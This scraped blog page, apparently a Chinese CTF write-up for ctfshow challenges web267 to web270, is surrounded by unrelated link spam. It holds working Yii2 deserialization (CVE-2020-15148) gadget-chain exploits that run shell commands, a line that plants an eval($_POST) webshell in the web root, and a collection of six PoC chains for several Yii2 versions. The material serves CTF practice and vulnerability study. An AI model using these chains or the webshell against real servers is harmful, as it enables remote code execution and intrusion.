当前位置: 首页 > news >正文

免费下载代码的网站免费做元宵节卡片的网站

免费下载代码的网站,免费做元宵节卡片的网站,软文推广平台排名,wordpress 博客 视频教程目录 web267 web268 web269 web270 总结 web267 页面用的什么框架不知道 看源码看一下 框架就是一种软件工具#xff0c;它提供了一些基础功能和规范#xff0c;可以帮助开发者更快地构建应用程序。比如Yii框架和ThinkPHP框架就是两个流行的PHP框架#xff0c;它们提供…目录 web267 web268 web269 web270 总结 web267 页面用的什么框架不知道 看源码看一下 框架就是一种软件工具它提供了一些基础功能和规范可以帮助开发者更快地构建应用程序。比如Yii框架和ThinkPHP框架就是两个流行的PHP框架它们提供了很多现成的功能和工具让开发者可以更轻松地编写代码不需要从零开始。使用框架可以加快开发速度、提高代码质量并且有助于维护和扩展应用程序。 查看源码发现有个yii.js的脚本文件。 yii.js是一个与Yii框架相关的JavaScript文件。Yii是一个流行的PHP框架它提供了一些功能和工具用于简化Web应用程序的开发过程。如果你在使用Yii框架构建网站或应用程序那么引用这个脚本文件可能是为了使用Yii框架提供的一些客户端功能或特性。判断出该网页使用的是yii框架 点进去发现是2.0的版本 网上也流传了反序列化链 Yii2 2.0.38 之前的版本存在反序列化漏洞程序在调用unserialize 时攻击者可通过构造特定的恶意请求执行任意命令。CVE编号是CVE-2020-15148。 现在找一下入口由于是反序列化利用链我们需要一个入口点 弱口令登陆一下 看一下 发现about页面有一点变化 查看源码 给了个提示 给的是 我以为是在首页面位置使用呢 原来就是在adout页面用连接 因为就是这个页面给的提示 按理说就是应该在这个页面的url后加入该参数 发现一个反序列化入口点给了入口 和需要提交的参数名 访问一下 结果是空白 证明是有这个页面的光访问不行还得传个值否则访问不到 所以他才给提示 通用的链子 exp ?php namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct(){$this-checkAccess passthru;$this-id tac /flag;}} } namespace Faker{use yii\rest\CreateAction;class Generator{protected $formatters;public function __construct(){$this-formatters[close] [new CreateAction(), run];}} } namespace yii\db{use Faker\Generator;class BatchQueryResult{private $_dataReader;public function __construct(){$this-_dataReader new Generator;}} } namespace{echo base64_encode(serialize(new yii\db\BatchQueryResult)); }passthru也是远程命令执行的函数 这个方便 大师傅就凭着感觉走 切合实际 checkAess‘shell_exec’ idecho ?php eval(\$_POST[1]);phpinfo();? /var/www/html/basic/web/1.php; 注意看大师傅的视频特别是这个讲解 从头到位出问题 就得多尝试  有几点我说一下 命令多换换 单引号双引号多换换 还有转移 真的是学的越多越好  查询该页面位置pwd的时候 使用了DNS外带 标记一下有时间学DNS外带 大师傅如何确定的当前路径 在DNSLOG里面先复制地址 用的大佬的图 写shell 访问成功后 找到flag位置 web268 用267的方式试一遍 不行 可能被过滤了 把eval shell等字符串使用点进行拼接 发现还是不行 那就只能是一个原因了 这个链子被过滤了 这个链子用不来了了 现成链子 exp ?php namespace yii\rest {class Action{public $checkAccess;}class IndexAction{public function __construct($func, $param){$this-checkAccess $func;$this-id $param;}} } namespace yii\web {abstract class MultiFieldSession{public $writeCallback;}class DbSession extends MultiFieldSession{public function __construct($func, $param){$this-writeCallback [new \yii\rest\IndexAction($func, $param), run];}} } namespace yii\db {use yii\base\BaseObject;class BatchQueryResult{private $_dataReader;public function __construct($func, $param){$this-_dataReader new \yii\web\DbSession($func, $param);}} } namespace {$exp new \yii\db\BatchQueryResult(shell_exec, cp /f* 1.txt); //此处写命令echo(base64_encode(serialize($exp))); } 直接访问1.txt 在这里说一下大师傅说以后遇见这种yii框架的漏洞 找到入口把知道的链子都试一下 web269 还是一样的使用web268链子  发现成功拿下flag web270 还用web268链子 成功拿下 总结 这几道yii框架的反序列化漏洞 虽然没让我学会原理 但是我学会了 如果遇见某一类框架漏洞 直接找入口 找到入口后 网上找现成的链子 一个一个去尝试现在我的时间不多了只能按照教程这么思路的来一遍这种框架漏洞 具体原理目前没时间学 如果以后有时间搜索YII链子学习反序列化 2023/12/7 14:38图书馆 记录一下链子 poc1 ?phpnamespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this-checkAccess phpinfo;$this-id 1; //命令执行}} } namespace Faker {use yii\rest\IndexAction;class Generator{protected $formatters;public function __construct(){$this-formatters[close] [new IndexAction(), run];}} } namespace yii\db{use Faker\Generator;class BatchQueryResult{private $_dataReader;public function __construct(){$this-_dataReadernew Generator();}} } namespace{use yii\db\BatchQueryResult;echo base64_encode(serialize(new BatchQueryResult())); }poc2 yii2.2.37 ?phpnamespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this-checkAccess system;$this-id whoami;}} } namespace yii\db{use yii\web\DbSession;class BatchQueryResult{private $_dataReader;public function __construct(){$this-_dataReadernew DbSession();}} } namespace yii\web{use yii\rest\IndexAction;class DbSession{public $writeCallback;public function __construct(){$anew IndexAction();$this-writeCallback[$a,run];}} }namespace{use yii\db\BatchQueryResult;echo base64_encode(serialize(new BatchQueryResult())); } poc3 2.0.38 ?php namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct(){$this-checkAccess system;$this-id ls;}} }namespace Faker{use yii\rest\CreateAction;class Generator{protected $formatters;public function __construct(){// 这里需要改为isRunning$this-formatters[isRunning] [new CreateAction(), run];}} }// poc2 namespace Codeception\Extension{use Faker\Generator;class RunProcess{private $processes;public function __construct(){$this-processes [new Generator()];}} } namespace{// 生成pocecho base64_encode(serialize(new Codeception\Extension\RunProcess())); } ?poc4 2.0.38 ?php namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct(){$this-checkAccess system;$this-id dir;}} }namespace Faker{use yii\rest\CreateAction;class Generator{protected $formatters;public function __construct(){// 这里需要改为isRunning$this-formatters[render] [new CreateAction(), run];}} }namespace phpDocumentor\Reflection\DocBlock\Tags{use Faker\Generator;class See{protected $description;public function __construct(){$this-description new Generator();}} } namespace{use phpDocumentor\Reflection\DocBlock\Tags\See;class Swift_KeyCache_DiskKeyCache{private $keys [];private $path;public function __construct(){$this-path new See;$this-keys array(axinarray(ishandsome));}}// 生成pocecho base64_encode(serialize(new Swift_KeyCache_DiskKeyCache())); } ?poc5 2.0.42 ?phpnamespace Faker; class DefaultGenerator{protected $default ;function __construct($argv){$this-default $argv;} }class ValidGenerator{protected $generator;protected $validator;protected $maxRetries;function __construct($command,$argv){$this-generator new DefaultGenerator($argv);$this-validator $command;$this-maxRetries 99999999;} }namespace Codeception\Extension; use Faker\ValidGenerator; class RunProcess{private $processes [];function __construct($command,$argv){$this-processes[] new ValidGenerator($command,$argv);} }$exp new RunProcess(system,whoami); echo(base64_encode(serialize($exp)));poc6 ?phpnamespace yii\rest {class IndexAction{function __construct(){$this-checkAccess system;$this-id whoami;}} }namespace Symfony\Component\String {use yii\rest\IndexAction;class LazyString{function __construct(){$this-value [new indexAction(), run];}} class UnicodeString{function __construct(){$this-value new LazyString();}} }namespace Faker {use Symfony\Component\String\LazyString;class DefaultGenerator{function __construct(){$this-default new LazyString();}}class UniqueGenerator{function __construct(){$this-generator new DefaultGenerator();$this-maxRetries 99999999;}} }namespace Codeception\Extension {use Faker\UniqueGenerator;class RunProcess{function __construct(){$this-processes[] new UniqueGenerator();}} }namespace {use Codeception\Extension\RunProcess;$exp new RunProcess();echo(base64_encode(serialize($exp))); }
http://www.dnsts.com.cn/news/106065.html

相关文章:

  • 越秀网站建设设计公司网站模板侵权案例
  • 云南网站做的好的公司哪家好南通专业制作网站
  • 无忧网站建设报价班徽logo设计图片
  • 大型门户网站江苏纯手工seo
  • 用flash做的网站有哪些珠海百度seo
  • 建设公众号官方网站总结格式模板
  • 人力社保网站建设的意义中国信息网官网查询系统
  • 比价网站开发wordpress采集破解版
  • 网站建设作业多少钱对电子商务网站建设的感想
  • 网站怎样才能被百度收录学校网站asp源码
  • 正能量不良网站免费软件下载电商网站设计论文
  • 芗城区建设局网站seo关键词排名优化怎样收费
  • 东莞网站优化公司哪家好域名估价网站
  • wordpress游戏网站主题网络营销促销形式
  • 重庆网站制作哪家好删除wordpress标志
  • 网站建设的收获体会虾子酱 wordpress
  • 郑州企业自助建站建站系统哪个比较好
  • 在中国做外国网站怎么收钱响应式网站建站平台
  • 社区网站怎么建湖南土特产销售网网站建设制作
  • 章丘网站制作住房和城市建设厅网站
  • 什么网站做贸易好cms下载官方网站
  • 网站图标可以用ps 做吗wordpress 调用评论
  • 网站制作无锡wordpress 总访问量
  • 如何做网站不被坑六安发布
  • 关于网站集约化建设的意见做一件代发网站
  • wordpress微网站个人可以做网站维护吗
  • 江门外贸集团有限公司英文网站wordpress网站如何添加栏目
  • 页面设计归运营管还是美工南京网站搜索引擎优化
  • 做网站域名的好处是什么如何利用wordpress编辑网站
  • 重庆建设工程信息网最新网站云南网站建设崇左